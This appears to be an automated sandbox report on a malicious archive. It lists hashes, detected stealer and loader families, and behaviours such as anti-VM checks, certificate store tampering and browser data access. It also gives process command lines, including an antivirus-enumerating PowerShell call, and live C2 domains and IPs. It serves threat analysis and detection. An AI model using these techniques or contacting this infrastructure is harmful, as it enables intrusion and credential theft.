| SHA512 | 5f57e132b811e83f167f4b624397262b83982c9781dd05cba20bd2de798fcf1fd010c268060fcdf5601d5c2af1d4a61c2ff8a3ed659a25ceb6a3ef1034b8cf4c |
memory/844-1027-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2460-1030-0x00000000051D0000-0x0000000005ABB000-memory.dmp
memory/5684-1032-0x00000000020C0000-0x00000000020C1000-memory.dmp
memory/2568-1033-0x0000000004B00000-0x0000000004B01000-memory.dmp
memory/2568-1035-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
memory/2568-1034-0x0000000004B70000-0x0000000004B71000-memory.dmp
memory/2568-1037-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
memory/2568-1038-0x0000000004B40000-0x0000000004B41000-memory.dmp
memory/2568-1039-0x0000000004B90000-0x0000000004B91000-memory.dmp
memory/2568-1040-0x0000000004B20000-0x0000000004B21000-memory.dmp
memory/2568-1041-0x0000000004B50000-0x0000000004B51000-memory.dmp
memory/2568-1042-0x0000000004B80000-0x0000000004B81000-memory.dmp
memory/2568-1043-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
memory/2568-1036-0x0000000000780000-0x0000000000D37000-memory.dmp
memory/5392-1031-0x0000000000400000-0x000000000311F000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | fef383de063d9a06313fef7706559216 |
| SHA1 | ae4bc1e98fd31ef81be55445e68fadb1e12b9d2e |
| SHA256 | a07223dcca324c67db2503a62e049839577f5bdacf3ded6bd2454aafbb7fe649 |
| SHA512 | f3c3816940245957764a17f708cef9822188669407dfee4faf967fa6831391d2c3a5041054b6238c986c802b391c45089502598d46d558988c16f4c0f271107f |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d3303bae634c7937c8eee59ea661dcad |
| SHA1 | bff96bcfc6fb4139b39e2075c09f5d983fd050ba |
| SHA256 | 248642cd9eb6166159c7e8286aab2578ad438d874594c08080358a9b596cda47 |
| SHA512 | 9b2710e09994248bb8a66dbf1dd308796c2054997a28d54bf15d3e17e5a8bbb915fa9aec6e0fdd6c676045e573e1238b4b59d17450a3984c95b07d5817aa4e33 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c8bb0c9748e5e42643c71507bb3e5b96 |
| SHA1 | 8eaa842c7787b73948bd3d6854f5efbd66fe7ebb |
| SHA256 | 0673bce96a64d18933b66e03d7618a0acad90f8351f57a2a671f2b7dd150ab21 |
| SHA512 | 0e98345388fb0c8ed469188d175e8128d40c89f6673303958db99f5710851f448e6aa3c541a04ce113a718bf879932eb22f407f09326af580ab47abfa263ac6a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2ce63f7b-a340-4812-bb97-ddbf69b20b87.tmp
| MD5 | 50302e65cb47e38c6996a173d92d04e3 |
| SHA1 | a8962ca20660a13d9965d5146237853619aa986f |
| SHA256 | 390e3ba7f27c9a8d92dbc8c716f799b785329d596a4718b8fc8bd7c7a5ac1ada |
| SHA512 | 92ee7f2b445113e00e2ba5d5aa2cb5125d56daeb2059b213b635dd9052d4d4fd45f65a1e4cb80e5dcf415790f4b583cab8bb2b9ffa9d00a8ef31bb1d17cea78d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
| MD5 | a5ce3aba68bdb438e98b1d0c70a3d95c |
| SHA1 | 013f5aa9057bf0b3c0c24824de9d075434501354 |
| SHA256 | 9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a |
| SHA512 | 7446f1256873b51a59b9d2d3498cef5a41dbce55864c2a5fb8cb7d25f7d6e6d8ea249d551a45b75d99b1ad0d6fb4b5e4544e5ca77bcd627717d6598b5f566a79 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
51s
Max time network
213s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"
C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe"
C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe
"C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"
C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe
"C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe"
C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe
"C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe"
C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe
"C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe"
C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe
"C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe"
C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe
"C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe"
C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe
"C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe"
C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe
"C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe"
C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe
"C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe"
C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe
"C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe"
C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp" /SL5="$40186,4124890,54272,C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"
C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
.\Install.exe /MFFdidt "525403" /S
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
Network
| Country | Destination | Domain | Proto |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| US | 172.67.171.112:80 | def.bestsup.su | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 172.67.180.119:443 | triedchicken.net | tcp |
| US | 104.21.69.242:443 | acenitive.shop | tcp |
| US | 104.21.69.242:443 | acenitive.shop | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 188.114.97.2:443 | carthewasher.net | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
